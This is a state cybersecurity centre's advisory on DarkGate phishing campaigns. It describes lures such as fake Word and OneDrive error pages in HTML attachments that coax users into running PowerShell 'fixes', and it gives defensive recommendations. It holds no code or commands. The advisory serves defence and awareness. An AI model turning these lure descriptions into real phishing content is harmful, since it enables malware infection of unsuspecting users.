NJCCIC: Phishing for DarkGate

DarkGate has spread through several phishing campaigns, including fake browser updates, the messaging feature in Microsoft Teams, and PDFs containing Google DoubleClick Digital Marketing (DDM) open redirects. The NJCCIC recently reported on a DarkGate campaign exploiting a Windows SmartScreen vulnerability.
The NJCCIC’s email security solution has recently observed multiple attempts to spread DarkGate malware through various phishing campaigns. These emails were flagged as they included newly registered domains and uncommon senders. While the content of the emails varied, they primarily referred to charges and payments due and included malicious HTML attachments. Once opened, a fake Microsoft Word document is loaded, displaying an error message that requests the installation of a root certificate and instructions for remediation. Upon initiating the purported fix, a PowerShell script triggers and installs DarkGate on the user’s device.
A second observed DarkGate campaign used similar phishing emails with malicious HTML attachments; however, once opened, the attachments claimed the user could not connect to Microsoft OneDrive. After clicking the “How to Fix” button, either PowerShell scripts automatically downloaded DarkGate or users were instructed on how to open PowerShell to initiate the “fix” themselves, which initiated the malware download.
Recommendations
Avoid clicking links and opening attachments in unsolicited emails. Confirm requests from senders via contact information obtained from verified and official sources. Type official website URLs into browsers manually. Facilitate user awareness training to include these types of phishing-based techniques. Maintain robust and up-to-date endpoint detection tools on every endpoint. Consider leveraging behavior-based detection tools rather than signature-based tools. Phishing and other malicious cyber activity can be reported to the FBI’s IC3 and the NJCCIC.